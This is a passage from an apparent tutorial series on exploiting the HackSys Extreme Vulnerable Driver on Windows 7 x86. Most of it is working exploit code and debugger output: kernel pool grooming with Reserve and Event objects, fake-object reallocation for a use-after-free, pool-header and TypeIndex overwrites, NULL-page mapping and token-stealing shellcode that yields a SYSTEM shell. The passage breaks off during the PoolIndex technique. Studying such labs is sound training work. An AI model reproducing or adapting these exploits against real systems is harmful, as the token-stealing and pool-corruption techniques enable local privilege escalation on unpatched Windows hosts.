With a crash in hand we need to replace the memory used by the object with something which give us code execution when referenced instead. Normally we'd have to hunt for an appropriate object and likely use a basic primitive to get us into the position of having a more useful primitive we can use to escalate our privileges. However luckily for us the HackSys Driver provides a function which makes this much easier. The log message ****** HACKSYS_EVD_IOCTL_CREATE_FAKE_OBJECT ****** precedes an exposed function which does exactly what we need.

Looking at the functions implementation, we can see it allocates 0x58 bytes of data and then checks the allocation was successful.

Once it's allocated the required memory, it copies data from the IOCTL input buffer into it.

At 1 the pointer to the allocated memory is in ebx, at 2 it validates that it is safe to read data from the input buffer and then at 3 it copies 0x16, 4 byte blocks from the input buffer into the newly allocated memory before returning.

The fact that the fake allocated object is the same size as the one we can free and cause to be referenced is the ideal scenario. By using the kernel pool massaging techniques described earlier we can cause the fake object to be allocated at the address the UAF object. By loading a pointer to some token stealing shellcode at the start of the fake object, we can then trigger the Use UAF object IOCTL code handler to make the driver execute our payload.

As the UAF object isn't 0x40 bytes like the Event object I used in the pool fengshui example, we'll use Reserve objects instead, as we found out earlier these are 0x60 bytes in memory which matches the UAF object of 0x58 bytes when you include the 8 byte POOL_HEADER. First of all we'll need to add the following headers.

//from https://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html
typedef struct _UNICODE_STRING  
{
    WORD Length;
    WORD MaximumLength;
    WORD * Buffer;
} UNICODE_STRING, *PUNICODE_STRING;


//from https://www.nirsoft.net/kernel_struct/vista/OBJECT_ATTRIBUTES.html
typedef struct _OBJECT_ATTRIBUTES  
{
    ULONG Length;
    PVOID RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

//from https://github.com/JeremyFetiveau/Exploits/blob/master/MS10-058.cpp
#define IOCO 1
typedef NTSTATUS(__stdcall *NtAllocateReserveObject_t) (OUT PHANDLE hObject, IN POBJECT_ATTRIBUTES ObjectAttributes, IN DWORD ObjectType);  

Next we add the following code to carry out the actual pool fengshui, this will fill any existing free 0x60 byte regions and then create a pattern of allocated and free 0x60 byte blocks.

HANDLE hReserveObjectsDefrag[10000] = { 0x0 };  
HANDLE hReserveObjectsPoolGroom[5000] = { 0x0 };

HMODULE hModule = LoadLibraryA("ntdll.dll");

if (hModule == NULL) {  
    printf("Couldn't load ntdll, how is computer running? : 0x%X\n", GetLastError());
    return 1;
}

NtAllocateReserveObject_t NtAllocateReserveObject = (NtAllocateReserveObject_t) GetProcAddress(hModule, "NtAllocateReserveObject");

if (NtAllocateReserveObject == NULL) {  
    printf("Couldn't get a reference to NtAllocateReserveObject in ntdll?!: 0x%X\n", GetLastError());
    return 1;
}

for (unsigned int i = 0; i < 0x1000; i++) {  
    NTSTATUS status = NtAllocateReserveObject(&hReserveObjectsDefrag[i], 0, IOCO);

    if (status != 0) {
        printf("Failed to allocate defrag reserve object 0x%X: 0x%X\n", i, GetLastError());
        return 1;
    }
}

for (unsigned int i = 0; i < 0x500; i++) {  
    NTSTATUS status = NtAllocateReserveObject(&hReserveObjectsPoolGroom[i], 0, IOCO);

    if (status != 0) {
        printf("Failed to allocate pool groom reserve object 0x%X: 0x%X\n", i, GetLastError());
        return 1;
    }
}

for (unsigned int i = 1; i < 0x500; i += 2) {  
    if (!CloseHandle(hReserveObjectsPoolGroom[i])) {
        printf("Failed to free reserve object needed for pool hole punching 0x%X: 0x%X\n", i, GetLastError());
        return 1;
    }
}

Now that we can force our fake object to be allocated where the UAF object was previously located we need to craft our fake object. We start by adding the token stealer used in the previous parts of this series to our user land code.

// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET    0x124    // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET   0x050    // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET        0x0B4    // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET      0x0B8    // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET      0x0F8    // nt!_EPROCESS.Token
#define SYSTEM_PID        0x004    // SYSTEM Process PID

VOID TokenStealingShellcodeWin7Generic() {  
    // No Need of Kernel Recovery as we are not corrupting anything
    __asm {
        ; initialize
        pushad; save registers state

        xor eax, eax; Set zero
        mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
        mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process

        mov ecx, eax; Copy current _EPROCESS structure

        mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
        mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4

        SearchSystemPID:
        mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, FLINK_OFFSET
            cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID

            mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
            mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM
            ; to current process
            popad; restore registers state
    }
}

Next lets get create our fake object, we know it needs to be 0x58 bytes with the first four containing a function pointer, the rest of the bytes we don't care about. By setting the function pointer as the address of our token stealing shellcode it will be executed when the driver references our fake object and triggers what it thinks is the original objects callback. This is placed immediately after the DeviceIOControl call used to free the UAF object.

size_t nInBufferSize = 0x58;  
PULONG lpInBuffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nInBufferSize);

if (!lpInBuffer) {  
    printf("HeapAlloc failed :( 0x%X\r\n", GetLastError());
    return 1;
}
printf("Input buffer allocated as 0x%X bytes.\r\n", nInBufferSize);  
printf("Input buffer address: 0x%p\r\n", lpInBuffer);

printf("Filling buffer with A's.\r\n");  
memset(lpInBuffer, 0x41, nInBufferSize);

printf("Loading shellcode pointer into start of buffer.\r\n");  
lpInBuffer[0] = (ULONG)&TokenStealingShellcodeWin7Generic;

for (unsigned int i = 0; i < 0x250; i++) {  
    DeviceIoControl(hDriver, HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT, lpInBuffer, 0, NULL, 0, &dwBytesReturned, NULL);
}
printf("0x250 fake object's allocated.\r\n");  

I created 0x250 of the fake objects to fill all of the gaps we created earlier. Additionally we need to define HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT at the top of our file.

#define HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT            CTL_CODE(FILE_DEVICE_UNKNOWN, 0x807, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

Finally some cleanup code and a call to system to launch calc.exe fits at the end of the code.

printf("SYSTEM?!?!\r\n");  
system("calc.exe");

printf("Exploit complete, cleaning up\n");  
for (unsigned int i = 0; i < 0x1000; i++) {  
    if (!CloseHandle(hReserveObjectsDefrag[i])) {
        printf("Failed to free reserve object defrag object 0x%X: 0x%X\r\n", i, GetLastError());
        return 1;
    }
}
for (unsigned int i = 0; i < 0x500; i += 2) {  
    if (!CloseHandle(hReserveObjectsPoolGroom[i])) {
        printf("Failed to free reserve object pool groom object 0x%X: 0x%X\r\n",i, GetLastError());
        return 1;
    }
}
HeapFree(GetProcessHeap(), 0, lpInBuffer);  
CloseHandle(hDriver);  
return 0;  

Building and then running the code (with special pool disabled!) gives us a nice calculator running as SYSTEM.

The final/full code for the exploit is on Github.

HackSysTeam Extremely Vulnerable Driver Pool Overflow

The IOCTL code to trigger the drivers pool overflow vulnerability is pretty easy to find, the function call immediately after ****** HACKSYS_EVD_IOCTL_POOL_OVERFLOW ****** is logged is the obvious target..

Looking into the handler function we can see that it makes a pool allocation on the Nonpaged pool (edi is xor'd with itself at the start of the function), of size 0x1F8 bytes.
If the allocation was successful the handler then copies data from the user supplied buffer into the pool. However the amount of data copied is controlled by the size provided in the IOCTL.

This means that if a caller provides a length greater than 0x1F8 bytes, an out of bounds write will happen, which could also be called a pool overflow. Again we'll enabled special pool to make triggering the vulnerability easier.

verifier /volatile /flags 0x1 /adddriver HackSysExtremeVulnerableDriver.sys  

The below code will provide an IOCTL request which will write 4 bytes past the end of the pool allocation, this should cause it to access a page marked as inaccessible and blue screen the system.

#include "stdafx.h"
#include <Windows.h>

#define HACKSYS_EVD_IOCTL_POOL_OVERFLOW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x803, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

int _tmain(int argc, _TCHAR* argv[])  
{
    DWORD lpBytesReturned;
    LPCSTR lpDeviceName = (LPCSTR) "\\\\.\\HackSysExtremeVulnerableDriver";

    printf("Getting the device handle\r\n");
    //HANDLE WINAPI CreateFile( _In_ lpFileName, _In_ dwDesiredAccess, _In_ dwShareMode, _In_opt_ lpSecurityAttributes,
    //_In_ dwCreationDisposition, _In_ dwFlagsAndAttributes, _In_opt_ hTemplateFile );
    HANDLE hDriver = CreateFile(lpDeviceName,           //File name - in this case our device name
        GENERIC_READ | GENERIC_WRITE,                   //dwDesiredAccess - type of access to the file, can be read, write, both or neither. We want read and write because thats the permission the driver declares we need.
        FILE_SHARE_READ | FILE_SHARE_WRITE,             //dwShareMode - other processes can read and write to the driver while we're using it but not delete it - FILE_SHARE_DELETE would enable this.
        NULL,                                           //lpSecurityAttributes - Optional, security descriptor for the returned handle and declares whether inheriting processes can access it - unneeded for us.
        OPEN_EXISTING,                                  //dwCreationDisposition - what to do if the file/device doesn't exist, in this case only opens it if it already exists, returning an error if it doesn't.
        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,   //dwFlagsAndAttributes - In this case the FILE_ATTRIBUTE_NORMAL means that the device has no special file attributes and FILE_FLAG_OVERLAPPED means that the device is being opened for async IO.
        NULL);                                          //hTemplateFile - Optional, only used when creating a new file - takes a handle to a template file which defineds various attributes for the file being created.

    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("Failed to get device handle :( 0x%X\r\n", GetLastError());
        return 1;
    }
        printf("Got the device Handle: 0x%X\r\n", hDriver);

    size_t nInBufferSize = 0x00000200;
    PULONG lpInBuffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nInBufferSize);

    if (!lpInBuffer) {
        printf("HeapAlloc failed :( 0x%X\r\n", GetLastError());
        return 1;
    }

    printf("Input buffer allocated as 0x%X bytes.\r\n", nInBufferSize);
    printf("Input buffer address: 0x%p\r\n", lpInBuffer);

    printf("Filling buffer.\r\n");

    memset(lpInBuffer, 0x41, nInBufferSize);

    DeviceIoControl(hDriver,
        HACKSYS_EVD_IOCTL_POOL_OVERFLOW,
        lpInBuffer,
        nInBufferSize,
        NULL, 
        0,
        &lpBytesReturned,
        NULL); 

    CloseHandle(hDriver);
    return 0;
}

Compiling and then running it, we get just what we wanted.

Debugging the crash we can see that the driver has attempted to write beyond the end of an allocation, as expected.

Looking at the details of the crash we can see that it crashed at the rep movs instruction we saw earlier in the HACKSYS_EVD_IOCTL_POOL_OVERFLOW handler.

Inspecting the corrupted memory address we see a series of 0x41 bytes followed by inaccessible memory, just as expected.

Pool Overflow Pool Fengshui

As with the UAF exploit, we need to be able to ensure that our memory is correctly located when it's allocated. In this case we want to make sure that another object is immediately following it in memory. This time our allocated memory is 0x200 bytes in size (0x1F8 + an 8 byte header), the Reserve object allocations had a size of 60 bytes in total which is too small and cleanly divide the amount we want making it impractical, however the Event objects we looked at earlier at 0x40 byte allocations. This cleaning divides are allocation into 8 which is ideal.

In order to groom the heap this time we'll again defragment it using Event objects, then we'll allocate a large number of contiguous Event objects and free them in blocks of eight. This should leave us with a pattern of 200 bytes of allocated and then allocated non-paged pool memory. The code below carries out the pool grooming before triggering a debugger break so that we can check it has worked.

#include "stdafx.h"
#include <Windows.h>

int _tmain(int argc, _TCHAR* argv[])  
{
    HANDLE hDefragEvents[0x10000];
    HANDLE hPoolGroomEvents[0x1000];

    for (unsigned int i = 0; i < 0x10000; i++) {
        HANDLE hEvent = CreateEvent(NULL, false, false, TEXT(""));
        if (hEvent == NULL) {
            printf("Failed to create defrag event 0x%X: 0x%X\r\n", i, GetLastError());
            return 1;
        }
        hDefragEvents[i] = hEvent;
    }

    printf("Pool defrag'd\r\n");

    for (unsigned int i = 0; i < 0x1000; i++) {
        HANDLE hEvent = CreateEvent(NULL, false, false, TEXT(""));
        if (hEvent == NULL) {
            printf("Failed to create groom event 0x%X: 0x%X\r\n", i, GetLastError());
            return 1;
        }
        hPoolGroomEvents[i] = hEvent;
    }

    printf("Grooming phase 1 complete - contiguous events allocated.\r\n");

    for (unsigned int i = 0; i < 0x1000; i += 0x10) {
        for (unsigned int j = 0; j < 8; j++) {
            HANDLE hEvent = hPoolGroomEvents[i + j];
            if (!CloseHandle(hEvent)) {
                printf("Failed to punch hole with event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
                return 1;
            }
        }
    }

    printf("Grooming complete - pool full o'holes\r\n");

    printf("0x88th unfree'd handle: 0x%X\r\n", hPoolGroomEvents[0x88]);

    getchar();
    DebugBreak();

    for (unsigned int i = 0; i < 0x1000; i++) {
        HANDLE hEvent = hDefragEvents[i];
        if (!CloseHandle(hEvent)) {
            printf("Failed to remove defrag event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
            return 1;
        }
    }
    for (unsigned int i = 8; i < 0x1000; i += 0x10) {
        for (unsigned int j = 0; j < 8; j++) {
            HANDLE hEvent = hPoolGroomEvents[i + j];
            if (!CloseHandle(hEvent)) {
                printf("Failed to remove pool groom event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
                return 1;
            }
        }
    }

    CloseHandle(hDriver);
    return 0;
}

Once this has ran we can see the printed pointer value and then hit enter to trigger the break point.

In the kernel debugger I dump the handle information to get the objects details.

kd> !handle 0x40448  
...
40448: Object: 848c04f0  GrantedAccess: 001f0003 Entry: ab302890  
Object: 848c04f0  Type: (843d3440) Event  
    ObjectHeader: 848c04d8 (new version)
        HandleCount: 1  PointerCount: 1

Looking at the pool memory around the objects allocation we can see a nice repeating pattern of 8 allocated event objects followed by 8 free event objects, exactly as planned ^^

848c00c0 size:   40 previous size:   40  (Allocated)  Even (Protected)  
 848c0100 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0140 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0180 size:   40 previous size:   40  (Free )  Even (Protected)
 848c01c0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0200 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0240 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0280 size:   40 previous size:   40  (Free )  Even (Protected)
 848c02c0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c03c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0480 size:   40 previous size:   40  (Allocated)  Even (Protected)
*848c04c0 size:   40 previous size:   40  (Allocated) *Even (Protected)
        Pooltag Even : Event objects
 848c0500 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0540 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0580 size:   40 previous size:   40  (Free )  Even (Protected)
 848c05c0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0600 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0640 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0680 size:   40 previous size:   40  (Free )  Even (Protected)
 848c06c0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0740 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0780 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c07c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0840 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c08c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0900 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0940 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0980 size:   40 previous size:   40  (Free )  Even (Protected)
 848c09c0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0a00 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0a40 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0a80 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0ac0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0b00 size:   40 previous size:   40  (Allocated)  Even (Protected)

Now that we can trigger our overflow safe in the knowledge a 40 byte Event object will follow the memory we control, we can start putting together exploits.

Pool Overflow Exploitation Round 1

Now that we can reliably overwrite the header for an Event object, we need to actually overwrite something. I'm going to use two different methods, one which was originally discussed in Kernel Pool Exploitation on Windows 7 and one which was discussed in Data-only Pwning Microsoft Windows Kernel: Exploitation of Kernel Pool Overflows on Microsoft Windows 8.1. First of all I'm going to use the Object Type index overwrite technique (described in Nikita's talk) which is also how b33f and Ashfaq Ansari exploited this, if you want a different/probably better take.

As explained in this Code Machine blog post, each object within kernel memory on Windows consists of several structures as well as the object structure itself. The first of the is the POOL_HEADER structure we've discussed before. Here's an example for an Event object, we won't be corrupting this structure this time so we'll re-use the values in our exploit to leave it intact when we're overwriting another structure further along in memory.

dt nt!_POOL_HEADER 846a0a40  
   + 0x000 PreviousSize : Pos 0, 9 Bits  => 0x40  
   + 0x000 PoolIndex : Pos 9, 7 Bits => 0x0
   + 0x002 BlockSize Pos 0, 9 Bits => 0x40
   + 0x002 PoolType : Pos 9, 7 Bits => 0x2 (Non-Paged Pool)
   + 0x000 Ulong1 : Uint4B => 0x04080040 (Just a union field)
   +0x004 PoolTag          : 0xee657645
   +0x004 AllocatorBackTraceIndex : 0x7645
   +0x006 PoolTagHash      : 0xee65

Next there is one or more optional structures, which optional structures are present can be found by looking at the last structure which appears before the actual object, the OBJECT_HEADER. An example OBJECT_HEADER layout from an Event object is shown below:

dt nt!_OBJECT_HEADER 846a0a58  
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xc ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x8595e540 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8595e540 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

The InfoMask field only had bit 0x8 set which means the only optional structure between the pool header and the object header is OBJECT_HEADER_QUOTA_INFO as described in the Code Machine article. The article also tells us it's size is 0x10 bytes, so we can view it in memory by looking 0x10 bytes further back.

 dt nt!_OBJECT_HEADER_QUOTA_INFO 846a0a48 
   +0x000 PagedPoolCharge  : 0
   +0x004 NonPagedPoolCharge : 0x40
   +0x008 SecurityDescriptorCharge : 0
   +0x00c SecurityDescriptorQuotaBlock : (null)

The OBJECT_HEADER structure is the one we'll be corrupting, so when we overwrite this structure we'll use it's default values to leave it intact.

The OBJECT_HEADER structure contains object metadata for managing the object, indicating optional headers, storing debug information etc. As described in Nikita's slides this header includes the 'TypeIndex' field, this is used as an index into the ObTypeIndexTable which is used to store pointers to the OBJECT_TYPE structures which provide important details about each object to the kernel. Looking at the ObTypeIndexTable in windbg we can see the entries.

dd nt!ObTypeIndexTable  
82b46580  00000000 bad0b0b0 841338c8 84133800  
82b46590  84133738 841334f0 841b8040 841b8f78  
82b465a0  841b8eb0 841b8de8 841b8d20 841b8668  
82b465b0  841bd440 841d9f78 841cd040 841c7418  

Viewing entry 0xc as an OBJECT_TYPE structure gives us the following:

dt nt!_OBJECT_TYPE poi(nt!ObTypeIndexTable + (4*0xc))  
   +0x000 TypeList         : _LIST_ENTRY [ 0x841bd440 - 0x841bd440 ]
   +0x008 Name             : _UNICODE_STRING "Event"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xc ''
   +0x018 TotalNumberOfObjects : 0x6957
   +0x01c TotalNumberOfHandles : 0x69a6
   +0x020 HighWaterNumberOfObjects : 0x7477
   +0x024 HighWaterNumberOfHandles : 0x74d1
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0x078 TypeLock         : _EX_PUSH_LOCK
   +0x07c Key              : 0x6e657645
   +0x080 CallbackList     : _LIST_ENTRY [ 0x841bd4c0 - 0x841bd4c0 ]

So we definitely have the correct object type, but there's nothing that will obviously give us code execution. Looking further into the structure we see the TypeInfo field, examining this closer in windbg shows us a nice series of function pointers.

dt nt!_OBJECT_TYPE_INITIALIZER (poi(nt!ObTypeIndexTable + (4*0xc)) + 0x28)  
   +0x000 Length           : 0x50
   +0x002 ObjectTypeFlags  : 0 ''
   +0x002 CaseInsensitive  : 0y0
   +0x002 UnnamedObjectsOnly : 0y0
   +0x002 UseDefaultObject : 0y0
   +0x002 SecurityRequired : 0y0
   +0x002 MaintainHandleCount : 0y0
   +0x002 MaintainTypeList : 0y0
   +0x002 SupportsObjectCallbacks : 0y0
   +0x002 CacheAligned     : 0y0
   +0x004 ObjectTypeCode   : 2
   +0x008 InvalidAttributes : 0x100
   +0x00c GenericMapping   : _GENERIC_MAPPING
   +0x01c ValidAccessMask  : 0x1f0003
   +0x020 RetainAccess     : 0
   +0x024 PoolType         : 0 ( NonPagedPool )
   +0x028 DefaultPagedPoolCharge : 0
   +0x02c DefaultNonPagedPoolCharge : 0x40
   +0x030 DumpProcedure    : (null) 
   +0x034 OpenProcedure    : (null) 
   +0x038 CloseProcedure   : (null) 
   +0x03c DeleteProcedure  : (null) 
   +0x040 ParseProcedure   : (null) 
   +0x044 SecurityProcedure : 0x82c68936     long  nt!SeDefaultObjectMethod+0
   +0x048 QueryNameProcedure : (null) 
   +0x04c OkayToCloseProcedure : (null) 

This means functions are being jumped to based on the structure. If we can control one of these we should be able to get the kernel to execute shellcode at an address of our choosing. Looking backwards you can see that the first entry of the ObTypeIndexTable is a NULL pointer, so we overwrite the TypeIndex field in the OBJECT_HEADER with 0 then the kernel should try to read the function pointers from the NULL page when it tries to execute them. As we're doing this on Windows 7 32 bit, we can allocate the NULL page and as a consequence control where the kernels execution jumps to, allowing us to escalating our privileges with the same shellcode I've used previously.

So now we want to overwrite the TypeIndex field, leaving every other field between the end of our buffer and the Event object intact. We start by increasing the size of the InBuffer we used before. An extra 0x28 bytes will cover the POOL_HEADER (0x8 bytes), OBJECT_HEADER_QUOTA_INFO (0x10 bytes) and the OBJECT_HEADER up to and including TypeIndex (0x10 bytes).

size_t nInBufferSize = 0x1F8 + 0x28;  

First of all we overwrite the POOL_HEADER and OBJECT_HEADER_QUOTA_INFO structures with their default values as we saw before.

lpInBuffer[0x1F8 / 4] = 0x04080040;  
//dt nt!_POOL_HEADER  
//  + 0x000 PreviousSize : Pos 0, 9 Bits  => 0x40  
//    + 0x000 PoolIndex : Pos 9, 7 Bits => 0x0
//    + 0x002 BlockSize Pos 0, 9 Bits => 0x40
//    + 0x002 PoolType : Pos 9, 7 Bits => 0x2 (Non-Paged Pool)
//    + 0x000 Ulong1 : Uint4B => 0x04080040 (Just a union field)
lpInBuffer[0x1FC / 4] = 0xee657645;  
//    + 0x004 PoolTag : Uint4B=> 0xee657645 => 'Even'
//    + 0x004 AllocatorBackTraceIndex : Uint2B => 0x7645
//    + 0x006 PoolTagHash : Uint2B => 0xee65

lpInBuffer[0x200 / 4] = 0x00000000;  
// dt nt!_OBJECT_HEADER_QUOTA_INFO
//    + 0x000 PagedPoolCharge  : Uint4B
lpInBuffer[0x204 / 4] = 0x00000040;  
//  + 0x004 NonPagedPoolCharge : Uint4B    
lpInBuffer[0x208 / 4] = 0x00000000;  
//  + 0x008 SecurityDescriptorCharge : Uint4B
lpInBuffer[0x20C / 4] = 0x00000000;  
//  + 0x00c SecurityDescriptorQuotaBlock : Ptr32 Void

Finally we overwrite the OBJECT_HEADER structure, mostly with it's default values but with the TypeIndex value set to 0.

//This provides meta data and procedures pointers to keep track of and manage the Object itself
lpInBuffer[0x210 / 4] = 0x00000001;  
//dt nt!_OBJECT_HEADER
//    + 0x000 PointerCount     : Int4B => 1, one active pointer to the object
lpInBuffer[0x214 / 4] = 0x00000001;  
//  + 0x004 HandleCount : Int4B => 1, one active handle to the object
//    + 0x004 NextToFree : Ptr32 Void => Unused on an allocated object
lpInBuffer[0x218 / 4] = 0x00000000;  
//  + 0x008 Lock : _EX_PUSH_LOCK => NULL, 
//Interesting note from codemachine: On older version of Windows, the object manager attempted to acquire an object type specific lock (OBJECT_TYPE->TypeLock) before performing an operation on an object. This implied that no other object of that type in the entire system could be manipulated for the duration the object type lock was held.
lpInBuffer[0x21C / 4] = 0x00080000;  
//  + 0x00c TypeIndex : UChar => 0x00 - This is the only field we corrupt, normally for an event object on Win7SP1 this would be 0xC
//    + 0x00d TraceFlags : UChar => 0x00
//    + 0x00e InfoMask : UChar => 0x08
//    + 0x00f Flags : UChar => 0x00

//We only wanted to modify the TypeIndex field above so stop overwriting before completely overwriting the structure, for completions sake it's fields are:
//  + 0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
//    + 0x010 QuotaBlockCharged : Ptr32 Void
//    + 0x014 SecurityDescriptor : Ptr32 Void
//    + 0x018 Body : _QUAD

Now let's run the code (making sure Special Pool has been disabled) and we should get a crash with the kernel trying to access the OBJECT_TYPE structure at an address of 0x0. I immediately got a BugCheck in my attached debugger, looking at instruction and registers at the time of the exception we see exactly what we hoped for.

r  
eax=a5173e38 ebx=00000000 ecx=00000000 edx=85911dd0 esi=85911dd0 edi=84d9a8f0  
eip=82c4835d esp=9779bba0 ebp=9779bbdc iopl=0         nv up ei ng nz na po nc  
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010282  
nt!ObpCloseHandleTableEntry+0x28:  
82c4835d 837b7400        cmp     dword ptr [ebx+74h],0 ds:0023:00000074=????????  

A function called ObpCloseHandleTableEntry is erroring whilst trying to read memory from ebx+0x74 with ebx being 0. This would correspond to the DeleteProcedure entry in the OBJECT_TYPE structure if it was being read from the NULL page as planned. Now we just need to allocate the NULL page, using the same method as before in this series, and set one of the function pointer offsets to point at our token stealing shellcode.

The following code was added at the start of main to allocate the NULL page.

HMODULE hNtdll = GetModuleHandle("ntdll.dll");

if (hNtdll == INVALID_HANDLE_VALUE) {  
    printf("Could not open handle to ntdll. \n");
    CloseHandle(hDriver);
    return 1;
}

//Get address of NtAllocateVirtualMemory from the dynamically linked library and then cast it to a callable function type
PNtAllocateVirtualMemory NtAllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");;

if (!NtAllocateVirtualMemory) {  
    printf("Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError());
    return 1;
}

//We can't outright pass NULL as the address but if we pass 1 then it gets rounded down to 0...
PVOID baseAddress = (PVOID)0x1;  
SIZE_T regionSize = 0x2000; //Probably enough, it will get rounded up to the next page size  
                                // Map the null page
NTSTATUS ntStatus = NtAllocateVirtualMemory(  
    GetCurrentProcess(), //Current process handle
    &baseAddress, //address we want our memory to start at, will get rounded down to the nearest page boundary
    0, //The number of high-order address bits that must be zero in the base address of the section view. Not a clue here
    &regionSize, //Required size - will be modified to actual size allocated, is rounded up to the next page boundary
    MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, //claim memory straight away, get highest appropriate address
    PAGE_EXECUTE_READWRITE //All permissions
);

if (ntStatus != 0) {  
    printf("Virtual Memory Allocation Failed: 0x%x\n", ntStatus);
    return 1;
}

printf("Address allocated at: 0x%p\n", baseAddress);  
printf("Allocated memory size: 0x%X\n", regionSize);  

With the NULL page successfully allocated we just need to put a pointer to our shellcode in place of one of the function pointers. I tried placing a shellcode pointer at the offset of each function and found that the Delete, OkayToClose and Close Procedure would lead to shellcode being executed in a straight forward way. I decided to overwrite the Delete Procedure as b33f used OkayToClose and Ashfaq used Close.

*(PULONG)0x64 = (ULONG) &TokenStealingShellcodeWin7Generic; 

Finally we need to slightly modify the shellcode as the Delete procedure expects a 4 byte argument which needs to be removed from the stack to avoid things getting unstable. Just adding ret 4; to the end of the shellcode fixes it. Finally just add a nice system("calc.exe"); before we start tidying up memory.Now we run the code again and should get a nice calculator running as SYSTEM as shown below.

The final/full code for the exploit is on Github.

Pool Overflow exploitation round 2

The second technique for exploiting this vulnerability, I'm going to use is the PoolIndex overwrite technique used as an example in Kernel Pool Exploitation on Windows 7 and used with example code at First Dip Into the Kernel Pool : MS10-058.

This time we'll only be overwriting the POOL_HEADER structure of the neighboring Event object, so our in buffer can be smaller.

size_t nInBufferSize = 0x1FC;  

The field we're going to overwrite is the PoolIndex field. By default a Windows 7 host will only have one Nonpaged pool, which means this field won't actually be used. So first all we'll overwrite the PoolType field to make the block look it's part of the Paged Pool. As we saw earlier the value needed in the field can be found in the POOL_TYPE enum and ends up being 3.

PagedPool, NonPagedPoolMustSucceed = NonPagedPool + 2  

The PoolIndex field is used to index into the nt!ExpPagedPoolDescriptor array to find the correct PoolDescriptor for an object when it is free'd. Looking at the array in windbg we see the following.

dd nt!ExpPagedPoolDescriptor  
82ba7018  8432c000 8432d140 8432e280 8432f3c0  
82ba7028  84330500 00000000 00000000 00000000  
82ba7038  00000000 00000000 00000000 00000000  

